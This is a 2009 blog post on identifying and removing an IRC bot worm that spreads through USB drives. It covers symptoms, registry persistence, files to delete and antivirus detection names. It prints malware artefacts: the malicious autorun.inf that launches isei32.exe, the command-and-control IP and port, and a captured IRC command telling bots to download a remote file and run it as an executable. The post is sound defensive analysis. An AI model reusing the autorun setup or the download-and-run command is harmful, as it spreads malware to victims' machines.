Mar 2, 2009

Remove IRC Bot spreading via Flash Disk

Symptoms:-

1. P:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe (Removable Disk)
2. Other Process names : -werasd.exe,wejhjkkkl.exe(Archive File),isei32.exe,2w.exe,one.jpg
3. Connects to :- 208.99.193.130
4. Folder icon in place of drive icon in My Computer.
5. Autorun.inf
[autorun]
open=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe
shell\open\default=1
6.Outbound Traffic : 208.99.193.130:6667


PASS sock
NICK fdqlte
USER okfrpc "" "wao" :okfrpc

:Irc.WoLF.Net NOTICE AUTH :*** Looking up your hostname...
:Irc.WoLF.Net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:Irc.WoLF.Net 001 fdqlte
:Irc.WoLF.Net 002 fdqlte :               M0dded by uNkn0wn Crew            
:Irc.WoLF.Net 003 fdqlte
:Irc.WoLF.Net 004 fdqlte :          www.uNkn0wn.eu - iD@uNkn0wn.eu         
:Irc.WoLF.Net 005 fdqlte
:Irc.WoLF.Net 005 fdqlte
:Irc.WoLF.Net 005 fdqlte
:Irc.WoLF.Net 422 fdqlte :MOTD File is missing
:fdqlte MODE fdqlte :+iR

JOIN #us# us..

:fdqlte!okfrpc@myIP JOIN :#us#
:Irc.WoLF.Net 332 fdqlte #us# :.kktt http://allmobile.dp.ua/one.jpg c:\emwqnmnmwwlj.exe 1
:Irc.WoLF.Net 333 fdqlte #us# A 1236188567

00000000  6B C4 E8 1E FF EF 4B A8  D5 D8 6B F2 1D 95 F4 45   k.....K. ..k....E
00000010  3E 27 EE 4F FE F4 38 1A  84 97 3F 31 5A 18 36 A8   >'.O..8. ..?1Z.6.
00000020  FB FE CB 6E 48 3B 2F 50  52 49 56 4D 53 47 20 23   ...nH;/P RIVMSG #
00000030  75 73 23 20 3A 53 75 63  63 65 73 73 2E 0D 0A      us# :Suc cess...

00000000  3A 49 72 63 2E 57 6F 4C  46 2E 4E 65 74 20 34 32   :Irc.WoL F.Net 42
00000010  31 20 66 64 71 6C 74 65  20 6B C4 E8 1E FF EF 4B   1 fdqlte  k.....K
00000020  A8 D5 D8 6B F2 1D 95 F4  45 3E 27 EE 4F FE F4 38   ...k.... E>'.O..8
00000030  1A 84 97 3F 31 5A 18 36  A8 FB FE CB 6E 48 3B 2F   ...?1Z.6 ....nH;/
00000040  50 52 49 56 4D 53 47 20  3A 55 6E 6B 6E 6F 77 6E   PRIVMSG  :Unknown
00000050  20 63 6F 6D 6D 61 6E 64  0D 0A                      command ..

Removal Instructions:-


1.Boot into Safe Mode.
2.Use  Autoruns to disable the following entries from startup

Startup Entries:-

-HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ISPSERVICE mIRC    mIRC Co. Ltd.    c:\windows\system32\werasd.exe   

-HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
n/a Microsoft    Coded yardim60    c:\recycler s-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe               

3.Delete the following files
c:\recycler s-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe
c:\windows\system32\werasd.exe
C:\WINDOWS\system32\mirc.ini
C:\WINDOWS\system32\djkems
C:\WINDOWS\system32\wqsead (usernames)
C:\WINDOWS\system32\jewkqljlsd.sys
C:\WINDOWS\hidewin.exe
C:\WINDOWS\system32\mIRC32.exe
C:\WINDOWS\system32\852.reg  (threerandomnubers.reg)
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ISPSERVICE"="C:\\WINDOWS\\system32\\werasd.exe"
 
 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\command
"C:\WINDOWS\system32\werasd.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\command
"C:\WINDOWS\system32\werasd.exe"
 
%AppData%\Microsoft\Crypto\RSA\S-1-5-21-1960408961-1614895754-725345543-1004




Detected as:-
1.riskware not-a-virus:Client-IRC.Win32.mIRC.603 File: C:\werasd.exe
2.not-a-virus:RiskTool.Win32.HideWindows
3.BackDoor.Ircbot.FTF (AVG)


Kaspersky doesnt detect isei32.exe while other files are not detected if Settings>>Threats and Exclusions>>PDS is switched off.